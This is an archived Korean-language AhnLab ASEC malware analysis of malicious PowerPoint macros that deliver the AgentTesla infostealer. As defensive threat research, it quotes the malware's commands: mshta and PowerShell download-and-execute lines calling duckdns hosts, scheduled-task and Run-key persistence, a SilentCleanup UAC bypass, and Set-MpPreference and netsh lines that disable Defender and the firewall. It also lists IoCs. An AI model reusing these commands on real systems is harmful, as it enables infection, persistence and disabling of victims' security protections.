{
	"id": "f0a3a6ec-6a4a-44b8-b582-393799ba9619",
	"created_at": "2026-04-06T00:13:25.584087Z",
	"updated_at": "2026-04-10T03:20:51.01211Z",
	"deleted_at": null,
	"sha1_hash": "8ba038a7667b664d77a6b80ae69457bbc171d5ec",
	"title": "더욱 정교해진 악성 PPT 를 통해 AgentTesla 유포 중 - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2324766,
	"plain_text": "더욱 정교해진 악성 PPT 를 통해 AgentTesla 유포 중 - ASEC\r\nBy ATCP\r\nPublished: 2021-12-02 · Archived: 2026-04-05 14:37:13 UTC\r\nASEC 분석팀은 작년부터 꾸준하게 유포되고 있는 악성 PPT 파일에 대해 소개해왔다. 최근에는 악성 PPT\r\n파일에서 실행되는 스크립트에 다양한 악성 기능이 추가 된 것을 확인하였다. 악성 PPT 파일이 실행되는\r\n방식은 기존에 소개해왔던 방식과 동일하며, 악성 스크립트에 의해 추가 악성코드 실행, Anti-AV, UAC\r\nbypass 등의 기능을 수행한다.\r\nPPT 파일 실행시, 아래와 같이 기존과 동일하게 매크로 포함 여부를 선택하는 알림창이 생성된다. 이때 매\r\n크로 포함 버튼을 선택하게 되면 악성 매크로가 자동으로 실행되게 된다.\r\n매크로 포함 여부 알림\r\n악성 매크로가 실행되면 파워 포인트 에러를 위장한 오류창을 생성하여 사용자가 악성 행위를 알아차리\r\n기 힘들도록 하였다.\r\n오류창 위장\r\n악성 매크로는 Auto_Open() 함수에 의해 자동으로 실행되는 형태로, 악성 행위에 사용되는 데이터는 난독\r\n화되어 있다. 난독화 해제시 아래와 같은 문자열을 확인할 수 있으며, shell 함수를 통해 악성 명령어가 실\r\n행된다.\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 1 of 12\n\n난독화 해제 후 문자열\r\n악성 매크로에 의해 실행되는 악성 명령어는 아래와 같으며, 기존과 동일하게 mshta 프로세스를 통해 악성\r\nurl 에 접근하여 추가 스크립트를 실행하게 된다.\r\n악성 명령어\r\n“c:\\windows\\system32\\calc\\..\\mshta” “hxxps://hahahahh@j.mp/rendomchrsadowkaduaowidk”\r\nFinal URL\r\nhxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc\r\n해당 사이트에는 악성 vbscript 가 존재하며, 총 3개의 행위를 수행한다. 먼저, 런키에 파워쉘 명령어를 저\r\n장 후 해당 명령어를 실행한다. 레지스트리 경로와 파워쉘 명령어는 아래와 같다. 파워쉘 명령어는 두 개\r\n의 url 에 접속하여 추가 스크립트를 실행하게 된다. 추가 스크립트는 vbscript 이후 설명되어 있다.\r\n레지스트리 경로\r\nHKEY_CURRENT_USER\\ SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run:cwdfwiiuyqw\r\n파워쉘 명령어\r\npOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command\r\ni’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/p1/2.txt’) -\r\nuseB);i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/fin/c2.txt’) -useB);\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 2 of 12\n\nvbscript (1)\r\n이후 Shellexecute 를 통해 작업 스케줄러 등록 명령어를 실행하며, 명령어는 아래와 같다. 작업 스케줄러에\r\n등록되는 명령어는 mshta 를 통해 악성 url 에 접속하는 기능으로 63분마다 해당 명령어가 반복된다. 현재\r\n해당 url 은 접속이 불가능하다.\r\n작업 스케줄러 등록\r\nschtasks /create /sc MINUTE /mo 63 /tn kwdwdwfdfabvco /F /tr MsHtA\r\nhxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt open\r\nvbscript (2)\r\n마지막으로, 런키에 악성 mshta 명령어를 저장한다. 레지스트리 경로와 명령어는 아래와 같다. 해당 명령\r\n어는 런키에 등록되어 재부팅시 자동으로 실행되도록 하며 현재 해당 url 은 접속이 불가능하다.\r\n레지스트 경로\r\nHKEY_CURRENT_USER\\ SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run:pilodkis\r\nmshta 명령어\r\nMsHTa hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 3 of 12\n\nvbscirpt (3)\r\n앞에서 언급한 vbscript 에서 실행되는 파워쉘 명령어는 두 개의 url 에 접속을 시도하며, 각 url 에는 다른\r\n기능을 수행하는 악성 파워쉘 명령어가 존재한다. 파워쉘 명령어는 각각 악성코드 실행 및 anti-av, uac\r\nbypass 등의 기능을 수행한다. 먼저 첫번째 url 에서 실행되는 파워쉘 명령어는 악성 닷넷 실행 파일을 로드\r\n하는 기능을 수행한다. 로드되는 바이너리는 아래와 같은 형태로 존재하며, gzip 을 통해 압축 해제되어 실\r\n행된다.\r\n인코딩된 악성 바이너리\r\n위와 같은 형태로 총 2개의 바이너리가 존재하는데, 하나는 악성 행위를 수행하는 payload 이며 나머지 하\r\n나는 payload 를 정상 프로세스에 인젝션하는 기능을 수행한다. 아래 명령어를 통해 악성 바이너리가 로드\r\n되며, 디코딩된 첫번째 닷넷 파일의 projFUD.alosh_rat 의 Execute 메소드를 실행하는 것을 확인할 수 있다.\r\n또한  “C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\aspnet_compiler.exe” 경로와 디코딩된 두번째 닷\r\n넷 파일을 인자로 실행한다.\r\n악성 바이너리 로드\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 4 of 12\n\n실행되는 Execute 메소드는 아래와 같으며, aspnet_compiler.exe 프로세스를 생성 후 두번째 닷넷 파일을 인\r\n젝션하여 악성 행위를 수행한다. 이때 인젝션되는 파일은 정보유출형 악성코드인 AgentTesla 로 확인되었\r\n다.\r\n두번째 url 에서 실행되는 파워쉘 명령어는 백신 프로그램 검사 및 권한 상승 등 다양한 기능을 수행한다.\r\n아래와 같이 특정 경로에 백신 프로그램이 존재하는 경우, “C:\\Users\\Public\\commander.vbs” 파일을 생성하\r\n며 윈도우 시작 폴더에 복사 후 실행한다. commander.vbs 파일은 파워쉘 명령어를 통해\r\n“C:\\Users\\Public\\Comola.ps1” 파일을 실행하는 기능을 수행한다.\r\n백신 프로그램 검사\r\nComola.ps1 파일은 http://www.google.com 에 접속하여 다운로드되는 정상 스크립트로, 백신 제품이 존재\r\n하는 경우 악성 행위가 실행되지 않도록 한다.\r\nComola.ps1 파일 생성\r\n검사 대상 백신 프로그램의 경로는 아래와 같다.\r\n– C:\\Program Files\\ESET\\ESET Security\\ecmds.exe\r\n– C:\\Program Files\\Avast Software\\Avast\\AvastUI.exe\r\n– C:\\Program Files\\Common Files\\McAfee\\Platform\\McUICnt.exe\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 5 of 12\n\n– C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbamtray.exe\r\n– C:\\Program Files\\AVG\\Antivirus\\AVGUI.exe\r\n백신 프로그램이 존재하지 않는 경우, 아래와 같은 악성 행위가 수행된다. 다수의 스크립트 파일이 생성되\r\n며 각 파일에 대한 설명은 아래와 같다.\r\n1. C:\\Users\\Public\\cooki.ps1\r\n해당 파일은 특정 레지스트리 값을 변경하는 파워쉘 명령어가 포함되어 있으며, 레지스트리 값을 변경하\r\n여 윈도우 보안 알림 메시지 창을 비활성화하게 된다.\r\n변경되는 레지스트리\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Security and\r\nMaintenance\\Checks]\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Security and\r\nMaintenance\\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100]\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Security and\r\nMaintenance\\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101]\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Security and\r\nMaintenance\\Checks{088E8DFB-2464-4C21-BAD2-F0AA6DB5D4BC}.check.0]\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Security and\r\nMaintenance\\Checks{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101]\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Security and\r\nMaintenance\\Checks{134EA407-755D-4A93-B8A6-F290CD155023}.check.8001] 외 다수\r\n레지스트리 변경\r\n2. C:\\Users\\Public\\Cola.ps1\r\n해당 파일은 UAC bypass 기능을 수행한다. SID 를 검사하여 관리자일 경우, “C:\\Users\\Public\\common.vbs”\r\n파일을 실행한다. 관리자가 아닐 경우, 윈도우 서비스인 SilentCleanup 작업을 이용하여 권한을 상승한다.\r\nSilentCleanup 서비스는 실행시 자동으로 상승된 권한으로 실행되며 %windir%\\system32\\cleanmgr.exe 파일\r\n을 실행한다. 이때 환경 변수 %windir% 를 조작하여 원하는 명령어를 상승된 권한으로 실행시킬 수 있다.\r\n해당 파일에서는 환경변수를 아래와 같이 변경 후 SilentCleanup 서비스를 시작한다.\r\n환경변수 변경\r\npowershell -ep bypass -w h $PSCommandPath;\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 6 of 12\n\nUAC Bypass\r\n3. C:\\Users\\Public\\Tackel.ps1\r\n해당 파일은 윈도우 디펜더를 비활성화하는 기능을 수행한다. 특정 경로 및 프로세스를 윈도우 디펜더 예\r\n외 경로로 설정하며, AgentTesla 가 인젝션되는 aspnet_compiler.exe 프로세스 및 악성 행위에 사용되는 프\r\n로세스가 포함되어 있다. 또한 호스트 파일 변경 및 .NET Framework 3.5 기능 파일 설치를 수행한다.\r\n윈도우 디펜더 예외 경로 및 프로세스\r\nC:\\\r\nD:\\\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nC:\\Windows\\System32\\\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe\r\nC:\\Windows\\System32\\kernel32.dll\r\nexplorer.exe\r\naspnet_compiler.exe\r\nMshta.exe\r\npowershell.exe 외 다수\r\n윈도우 디펜더 비활성화\r\nNew-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name\r\nEnableLUA -PropertyType DWord -Value 0\r\nSet-MpPreference -PUAProtection disable\r\nSet-MpPreference -HighThreatDefaultAction 6\r\nSet-MpPreference -ModerateThreatDefaultAction 6\r\nSet-MpPreference -LowThreatDefaultAction 6\r\nSet-MpPreference -SevereThreatDefaultAction 6\r\nSet-MpPreference -ScanScheduleDay 8\r\nnetsh advfirewall set allprofiles state off\r\n호스트 파일 변경\r\nn66.254.114.41 virusscan.jotti.org\r\n윈도우 디펜더 비활성화, 호스트 파일 변경, 닷넷 프레임워크 설치\r\n4. C:\\Users\\Public\\common.vbs\r\n해당 파일은 Tackel.ps1, cooki.ps1 파일을 실행한다.\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 7 of 12\n\n5. C:\\Users\\Public\\Chrome.vbs\r\n해당 파일은 Cola.ps1 파일을 실행한다.\r\n최종적으로 Chrome.vbs 파일이 실행된다. 이후 추가 파일들이 순차적으로 실행되어 백신 프로그램 검사\r\n및 UAC Bypass, 윈도우 디펜더 비활성화 등 추가 악성 코드의 실행을 위한 환경을 설정하게 된다.\r\n악성 PPT 파일은 작년부터 꾸준하게 변형되고 있으며 다양한 악성 기능이 추가되어 유포되고 있다. 사용\r\n자들은 출처가 불분명한 파일의 열람은 자제해야하며, 문서에 포함된 의심 매크로는 실행하지 않도록 해\r\n야 한다.\r\n[파일 진단]\r\nDownloader/PPT.Generic\r\nTrojan/VBS.Runner\r\nTrojan/PowerShell.Bypass\r\nTrojan/PowerShell.Disabler\r\n[행위 진단]\r\nExecution/MDP.Mshta.M3546\r\n [기존 악성 PPT 관련 블로그]\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 8 of 12\n\nOutlook.exe 를 이용한 악성 PPT 매크로 유포 중 – ASEC BLOG\r\n최근 ASEC 분석팀은 꾸준하게 유포되고 있는 악성 PPT 파일의 변형을 확인하였다. 기존과 동일하게\r\nmshta.exe 를 이용하여 악성 스크립트를 실행하는 동작 방식으로, 중간 과정에서 outlook.exe 프로세스를\r\n이용하는 방식이 추가되었다. 악성 PPT 파일은 아래와 같이 피싱 메일의 첨부 파일을 통해 유포되고 있으\r\n며, 구매 문의와 관련된 내용을 포함하고 있다. 또한 이전 유형과 동일하게 악성 PPT 파일은 PDF 확장자로\r\n위장한 것을 확인할 수 있다. 유포 파일명 Purchase Inquiry_pdf.ppt 악성 PPT 파…\r\n지속적으로 유포되는 파워포인트 유형의 악성 첨부파일 – ASEC BLOG\r\n지난 4월, 아래의 포스팅을 통해 PPT파일을 매개체로 하여 유포되는 악성코드에 대해 소개한 바 있다.\r\nASEC 분석팀은 파워포인트 유형의 PPAM 파일을 이용한 악성 행위가 최근까지도 지속되는 것을 확인하\r\n여 이를 알리려 한다. 4월에 소개한 내용은 파워포인트에 포함된 매크로가 실행되면 mshta.exe를 이용하여\r\n악성 스크립트가 삽입된 blogspot 웹페이지의 소스가 공격에 바로 사용되었으나, 이번에는\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 9 of 12\n\npowershell.exe/wscript.exe를 이용한 프로세스가 추가되어 보다 더 복잡해진 것이 특징이라고 할 수 있다.\r\nV…\r\n피싱메일에 첨부된 PPT 파일을 통해 유포되는 AgentTesla !! – ASEC BLOG\r\nASEC 분석팀은 피싱메일에 악성 파워포인트(*.PPT) 파일이 첨부되어 유포중인 것을 확인하였다. 악성코\r\n드가 유포되고 동작하는 방식은 ASEC 블로그를 통해 지속적으로 소개해왔던 방식에서 크게 벗어나지 않\r\n으며, 기존에 사용했던 방법들을 조합한 것이 특징이라고 할 수 있다. 지난 2020년 7월에 ASEC블로그에\r\n소개한 내용(‘AgentTesla 악성코드 국내에 어떻게 유포되고 있나?’)은 공격자가 Pastebin 서비스를 사용하\r\n여 AgentTesla 를 유포한 것이며, 11월에 소개한 내용(‘국세청 ‘전자세금계산서’ 사칭한 Lok…\r\nAgentTesla 악성코드 국내에 어떻게 유포되고 있나? – ASEC BLOG\r\n올해 초부터 피싱 메일에 악성 파워포인트(*.PPT) 파일이 첨부되어 유포중인 사례가 확인되고 있다.\r\nASEC 분석팀에서는 최근 이러한 공격 방식을 통해 AgentTesla가 최종 실행된 것을 포착하여 이에 대해 알\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 10 of 12\n\n리려한다. 해외에서는 아래 블로그처럼 해외에서도 올 1월 정보유출형 악성코드 azorult가 메일에 첨부된\r\nPPT를 통해 유포되었다. (해외 블로그 : https://appriver.com/resources/blog/january-2020/powerpoint-malware-references-drake-lyrics-dro…\r\nMD5\r\n199afc572f448386b8a72f872b64778c\r\n35b2343da6d21a5cede2751026be78f8\r\n61cc1dac681dfcbcd8781a498684d434\r\n79106a7027e6bf3aff964ccf694d99fb\r\n8e7581085b48c219c5fafdf0868a644b\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nURL\r\nhttp[:]//bakuzamokxxxala[.]duckdns[.]org/b1/2[.]txt\r\nhttp[:]//www[.]minpowpoin[.]duckdns[.]org/fin/c2[.]txt\r\nhttp[:]//www[.]starinxxxgkular[.]duckdns[.]org/s1/2[.]txt\r\nhttps[:]//appriver[.]com/resources/blog/january-2020/powerpoint-malware-references-drake-lyrics-dro\r\nhttps[:]//download2389[.]mediafire[.]com/f68ak6xluypg/t1qm2d4ahq43wn3/2[.]doc\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nAhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용\r\n은 아래 배너를 클릭하여 확인해보세요.\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 11 of 12\n\nSource: https://asec.ahnlab.com/ko/29133/\r\nhttps://asec.ahnlab.com/ko/29133/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "KO",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/ko/29133/"
	],
	"report_names": [
		"29133"
	],
	"threat_actors": [],
	"ts_created_at": 1775434405,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8ba038a7667b664d77a6b80ae69457bbc171d5ec.pdf",
		"text": "https://archive.orkl.eu/8ba038a7667b664d77a6b80ae69457bbc171d5ec.txt",
		"img": "https://archive.orkl.eu/8ba038a7667b664d77a6b80ae69457bbc171d5ec.jpg"
	}
}